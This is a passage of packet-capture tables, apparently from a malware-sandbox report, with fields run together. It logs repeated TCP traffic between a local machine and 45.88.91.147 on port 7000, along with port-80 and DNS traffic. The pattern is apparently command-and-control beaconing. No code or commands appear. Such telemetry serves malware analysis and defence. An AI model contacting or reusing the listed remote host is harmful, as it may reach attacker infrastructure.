                                                    Oct 6, 2024 16:46:25.847702980 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.853466988 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:25.863259077 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.868233919 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:25.894587040 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.900224924 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:25.925945997 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.931020021 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:25.957415104 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.962321043 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:25.988487005 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.993299007 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:26.363759995 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:26.368663073 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:26.769610882 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:26.774374008 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:26.785490036 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:26.790543079 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:26.833281040 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:26.838069916 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:27.504065037 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:27.508976936 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:27.519922018 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:27.524967909 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:27.535407066 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:27.540544033 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:27.551031113 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:27.555882931 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:27.566678047 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:27.571687937 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:27.801244974 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:27.806144953 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:27.879061937 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:27.883898020 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:27.941531897 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:27.946593046 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:27.988168001 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:27.993021011 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:28.113754034 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:28.118685961 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:28.175817966 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:28.180701017 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:28.194955111 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:28.199809074 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:28.206949949 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:28.211888075 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:28.269608021 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:28.274529934 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:28.300888062 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:28.306242943 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:28.316525936 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:28.330074072 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:28.378827095 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:28.383955002 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.519812107 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.524754047 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.535470963 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.540242910 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.551101923 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.555905104 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.566625118 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.572099924 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.613445044 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.618324041 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.629132032 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.633941889 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.644776106 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.649581909 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.770066023 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.774889946 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.879599094 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.884402990 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.910541058 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.916834116 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.925714016 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.930478096 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.972771883 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.977688074 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.988358021 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.993097067 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.003992081 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.009017944 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.019534111 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.024291992 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.035038948 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.041352987 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.050759077 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.055607080 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.082268000 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.087524891 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.097779989 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.102663040 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.128998995 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.133804083 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.144511938 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.149312973 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.160002947 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.164812088 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.175694942 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.180584908 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.191428900 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.196325064 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.222836971 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.227823019 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.253936052 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.258898973 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.269449949 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.274504900 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.300736904 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.305664062 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.347754955 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.352605104 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.363219976 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.368335962 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.394372940 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.399255991 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.410228968 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.415254116 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.427090883 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.432174921 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.535526037 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.541023016 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.550961971 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.555963993 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.566426992 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.571592093 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.582071066 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.586884975 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.597631931 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.602603912 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.613430023 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.618329048 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.645018101 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.649890900 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.660279989 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.665195942 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.676147938 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.681071997 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.691766024 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.696892023 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.707453966 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.712428093 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.754869938 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.759962082 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.786252022 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.791423082 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.879231930 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.884679079 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.894768000 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.900414944 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.910243034 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.915419102 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.926331997 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.931312084 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.941912889 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.946862936 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.957513094 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.962342024 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.988929033 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.993838072 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:32.035321951 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:32.040303946 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:32.129532099 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:32.134479046 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:32.363344908 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:32.368205070 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:32.411540985 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:32.416538000 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:33.504067898 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:33.508929968 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:33.550941944 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:33.555771112 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:33.597882032 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:33.602811098 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:33.628988981 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:33.633846045 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:33.644941092 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:33.650165081 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:33.660254002 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:33.665096045 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:33.707393885 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:33.712764978 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:33.801009893 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:33.805836916 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:33.847696066 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:33.852495909 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:33.863301992 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:33.868252993 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:33.878834009 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:33.884071112 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:33.925976038 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:34.127327919 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:34.127394915 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:34.347904921 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:34.348026991 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:34.352881908 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:34.410151005 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:34.414978981 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:34.456993103 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:34.461786032 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:34.488171101 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:34.493279934 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:34.773312092 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:34.778239965 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:35.191541910 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:35.198278904 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:35.566880941 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:35.572072983 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:35.582456112 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:35.587923050 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:35.598033905 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:35.602879047 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:35.738504887 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:35.743307114 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:35.785689116 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:35.790823936 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:35.800925016 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:35.806324959 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:35.848009109 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:35.853224993 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:35.894834995 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:35.899683952 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:35.926346064 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:35.931200027 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:36.051032066 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:36.055953026 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:36.066482067 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:36.071976900 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:36.081967115 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:36.086850882 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:36.097682953 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:36.102529049 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:36.113398075 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:36.118288994 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:36.160140991 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:36.165033102 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:36.175769091 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:36.180594921 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:36.191397905 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:36.196727037 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:36.207097054 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:36.211878061 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:36.238387108 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:36.243870974 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:36.253966093 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:36.258832932 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:36.285167933 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:36.290443897 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:36.347768068 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:36.353710890 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:36.363285065 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:36.368191004 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:36.394509077 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:36.399302006 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:36.441457033 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:36.446258068 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:37.613728046 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:37.619216919 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:37.660486937 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:37.665255070 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:37.707164049 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:37.711911917 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:37.769716978 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:37.774477959 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:37.816534996 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:37.821968079 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:37.879290104 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:37.884057999 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:37.894757986 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:37.899975061 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:37.941641092 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:37.946598053 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:39.519505978 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:39.524497032 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:39.566495895 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:39.571620941 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:39.582407951 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:39.587272882 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:39.644656897 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:39.649692059 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:39.660167933 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:39.664992094 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:39.675900936 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:39.680869102 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:39.691401958 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:39.696346998 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:39.738279104 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:39.743417025 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:39.753982067 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:39.758984089 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:39.832151890 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:39.837197065 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:39.847681999 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:39.852646112 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:39.863414049 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:39.868359089 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:39.941365004 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:39.946540117 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:39.957005978 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:39.963712931 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:39.988591909 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:39.994080067 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:40.003912926 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:40.009494066 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:40.050754070 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:40.055938005 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:40.097980022 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:40.103027105 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:40.113347054 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:40.118176937 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:40.191622972 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:40.196621895 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:40.222711086 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:40.227699995 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:40.269767046 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:40.274879932 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:46.341461897 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:46.341594934 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:58.962460041 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:58.967073917 CEST4969980192.168.2.7208.95.112.1
                                                    Oct 6, 2024 16:46:58.967300892 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:58.969265938 CEST496337000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:58.974062920 CEST70004963345.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:58.977440119 CEST496337000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:59.269320965 CEST4969980192.168.2.7208.95.112.1
                                                    Oct 6, 2024 16:46:59.812827110 CEST496337000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:59.878684998 CEST4969980192.168.2.7208.95.112.1
                                                    Oct 6, 2024 16:47:01.081866026 CEST4969980192.168.2.7208.95.112.1
                                                    Oct 6, 2024 16:47:03.488094091 CEST4969980192.168.2.7208.95.112.1
                                                    Oct 6, 2024 16:47:08.300654888 CEST4969980192.168.2.7208.95.112.1

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 6, 2024 16:45:08.390705109 CEST5060053192.168.2.71.1.1.1
                                                    Oct 6, 2024 16:45:08.397561073 CEST53506001.1.1.1192.168.2.7
                                                    Oct 6, 2024 16:45:10.863224983 CEST5841753192.168.2.71.1.1.1
                                                    Oct 6, 2024 16:45:10.870364904 CEST53584171.1.1.1192.168.2.7
                                                    Oct 6, 2024 16:45:12.090074062 CEST5897553192.168.2.71.1.1.1
                                                    Oct 6, 2024 16:45:12.099929094 CEST53589751.1.1.1192.168.2.7
